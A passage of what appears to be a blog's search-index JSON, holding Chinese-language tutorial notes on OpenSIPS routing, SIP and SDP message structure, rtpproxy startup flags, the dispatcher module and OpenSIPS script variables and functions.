让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.rtpproxy.org/doc/master/user_manual.html https://github.com/sippy/rtpproxy ","permalink":"https://wdd.js.org/opensips/ch9/rtpproxy/","summary":"rtppoxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和那些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 让rtpproxy前台运行,在做rtpproxy容器化时,启动脚本必须带有-f,否则容器运行后会立即退出 -V 输出rtpproxy的版本 参考 https://www.rtpproxy.org/ https://www.","title":"rtpproxy学习"},{"content":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","permalink":"https://wdd.js.org/opensips/ch9/sdp/","summary":"sdp栗子 v=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Session描述 **\nv= (protocol version number, currently only 0) o= (originator and session identifier : username, id, version number, network address) s= (session name : mandatory with at least one UTF-8-encoded character) i=* (session title or short information) u=* (URI of description) e=* (zero or more email address with optional name of contacts) p=* (zero or more phone number with optional name of contacts) c=* (connection information—not required if included in all media) b=* (zero or more bandwidth information lines) One or more Time descriptions (\u0026#34;t=\u0026#34; and \u0026#34;r=\u0026#34; lines; see below) z=* (time zone adjustments) k=* (encryption key) a=* (zero or more session attribute lines) Zero or more Media descriptions (each one starting by an \u0026#34;m=\u0026#34; line; see below) 时间描述(必须) t= (time the session is active) r=* (zero or more repeat times) 媒体描述(可选) m= (media name and transport address) i=* (media title or information field) c=* (connection information — optional if included at session level) b=* (zero or more bandwidth information lines) k=* (encryption key) a=* (zero or more media attribute lines — overriding the Session attribute lines) ","title":"sdp协议简介"},{"content":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","permalink":"https://wdd.js.org/opensips/ch9/books/","summary":" Building Telephony Systems with OpenSIPS Second Edition SIP: Session Initiation Protocol Session Initiation Protocol (SIP) Basic Call Flow Examples Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) SDP: Session Description Protocol freeswitch权威指南 SIP: Understanding the Session Initiation Protocol, Third Edition (Artech House Telecommunications) https://tools.ietf.org/html/rfc4028 Hacking VoIP: Protocols, Attacks, and Countermeasures ","title":"参考资料与书籍"},{"content":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","permalink":"https://wdd.js.org/opensips/ch5/stateful-stateless/","summary":" 操作 无状态 有状态 SIP forward forward() t_relay() SIP replying sl_send_reply() t_reply() Create transaction t_newtran() Match transcation t_check_trans() ","title":"有状态和无状态路由"},{"content":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.example.com;lr\u0026gt;,\u0026lt;sip:p2.domain.com;lr\u0026gt; #8 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; #9 bye BYE sip:callee@u2.domain.com SIP/2.0 Traversing a Strict-Routing Proxy ","permalink":"https://wdd.js.org/opensips/ch5/strict-loose-routing/","summary":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com #2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.","title":"严格路由和松散路由"},{"content":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destionations, state。\ndestionations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会想可用的目的地转发sip消息\nid setid destionations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无用可转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch6/dispatcher/","summary":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destionations, state。\ndestionations表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会想可用的目的地转发sip消息\nid setid destionations state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无用可转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","title":"sip消息分发之dispatcher模块"},{"content":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示需要,有些变量类似于数组,可以使用需要来指定。需要可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # type type and name $hdr(Contact) # bye type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住变量的用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.opensips.org/Documentation/Script-CoreVar-2-4\n键值对变量 键值对变量是按需创建的 键值对只能用于有状态的路由处理中 键值对会绑定到指定的消息或者事务上 键值对初始化时是空值 键值对可以在所有的路由中读写 在响应路由中使用键值对,需要加载tm模块,并且设置onreply_avp_ mode参数 键值对可以读写,也可以删除 可以把键值对理解为key为hash, 值为堆栈的数据结构 $avp(my_name) = \u0026#34;wang\u0026#34; $avp(my_name) = \u0026#34;duan\u0026#34; xlog(\u0026#34;$avp(my_name)\u0026#34;) # duan xlog(\u0026#34;$avp(my_name)[0]\u0026#34;) # wang xlog(\u0026#34;$avp(my_name)[*]\u0026#34;) # wang duanduan 脚本变量 脚本变量只存在于当前主路由及其子路由中。路由结束,脚本变量将回收。 脚本变量需要指定初始化值,否则变量的值将不确定。 脚本变量只能有一个值 脚本变量读取要比键值对变量快,脚本变量直接引用内存的位置 如果需要变量,可以优先考虑使用脚本变量 $var(my_name) = \u0026#34;wangduanduan\u0026#34; $var(log_msg) = $var(my_name) + $ci + $fu xlog(\u0026#34;$var(log_msg)\u0026#34;) 脚本翻译 脚本翻译可以理解为一种工具函数,可以用来获取字符串长度,获取字符串的子字符等等操作。\n获取字符串长度 $(fu{s.len}) 字符串截取子串 $(var(x){s.substr,5,2}) 获取字符串的某部分 $(avp(my_uri){uri.user}) 将字符串值转为整数 $(var(x){s.int}) 翻译也可以链式调用 $(hdr(Test){s.escape.common}{s.len}) ","permalink":"https://wdd.js.org/opensips/ch5/var/","summary":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示需要,有些变量类似于数组,可以使用需要来指定。需要可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # type type and name $hdr(Contact) # bye type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住变量的用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.","title":"变量的使用"},{"content":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","permalink":"https://wdd.js.org/opensips/ch5/triger-time/","summary":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","title":"路由的触发时机"},{"content":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦查兵可以看成是初始化请求,搬运并可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的更具sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-ivite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b76 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt;, \u0026lt;sip:ss2.biloxi.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=314159 Call-ID: 3848276298220188511@atlanta.example.com CSeq: 2 ACK Content-Length: 0 注意,一定要明确一个消息,到底是请求还是响应。我们说初始化请求和序列化请求,说的都是请求,而不是响应。\n有些响应效应,例如代理返回的407响应,也会带有to tag。\nSIP/2.0 407 Proxy Authorization Required Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 ;received=192.0.2.101 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=3flal12sf Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Proxy-Authenticate: Digest realm=\u0026#34;atlanta.example.com\u0026#34;, qop=\u0026#34;auth\u0026#34;, nonce=\u0026#34;f84f1cec41e6cbe5aea9c8e88d359\u0026#34;, opaque=\u0026#34;\u0026#34;, stale=FALSE, algorithm=MD5 Content-Length: 0 下图初始化请求\n下图序列化请求\n路由脚本中,初始化请求都是许多下很多功夫去考虑如何处理的。而对于序列化请求的处理则要简单的多。\n","permalink":"https://wdd.js.org/opensips/ch5/init-seque/","summary":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦查兵可以看成是初始化请求,搬运并可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单的更具sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-ivite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.","title":"【重点】初始化请求和序列化请求"},{"content":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg\n","permalink":"https://wdd.js.org/opensips/ch5/module/","summary":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg","title":"脚本路由模块化"},{"content":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","permalink":"https://wdd.js.org/opensips/ch5/xlog/","summary":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","title":"优雅的使用xlog输出日志行"},{"content":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","permalink":"https://wdd.js.org/opensips/ch5/global-params/","summary":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","title":"全局参数配置"},{"content":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","permalink":"https://wdd.js.org/opensips/ch5/function/","summary":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 